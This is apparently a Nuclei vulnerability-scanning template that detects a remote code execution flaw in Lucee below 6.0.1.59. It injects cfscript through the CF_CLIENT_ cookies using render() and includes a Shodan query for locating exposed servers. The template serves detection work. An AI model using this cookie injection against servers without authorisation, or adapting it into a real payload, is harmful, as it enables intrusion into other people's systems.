nuclei-templates/http/vulnerabilities/lucee-rce.yaml

id: lucee-rce

info:
  name: Lucee < 6.0.1.59 - Remote Code Execution
  author: rootxharsh,iamnoooob,pdresearch
  severity: critical
  reference:
    - https://blog.projectdiscovery.io/hello-lucee-let-us-hack-apple-again
  metadata:
    verified: true
    max-request: 1
    shodan-query: http.title:"Lucee"
  tags: lucee,rce,oast

http:
  - raw:
      - |
        GET / HTTP/1.1
        Host: {{Hostname}}
        Cookie: CF_CLIENT_=render('<cfscript>writeoutput(ToBinary("{{base64('{{randstr}}')}}"))</cfscript>'); CF_CLIENT_LUCEE=render('<cfscript>writeoutput(ToBinary("{{base64('{{randstr}}')}}"))</cfscript>');

    matchers:
      - type: dsl
        dsl:
          - contains(body, "{{randstr}}")
          - contains(header, "cfid")
          - contains(header, "cftoken")
        condition: and
# digest: 490a00463044022060afbfb2688c7da6bf7703a0f37e232c530dcdf2ddf0579b8410ecfecad4401102200a69d7c0d3828c45e8ffcbf565a0c035b8f89649816cd817a5859b2dec7bfa7e:922c64590222798bb761d5b6d8e72950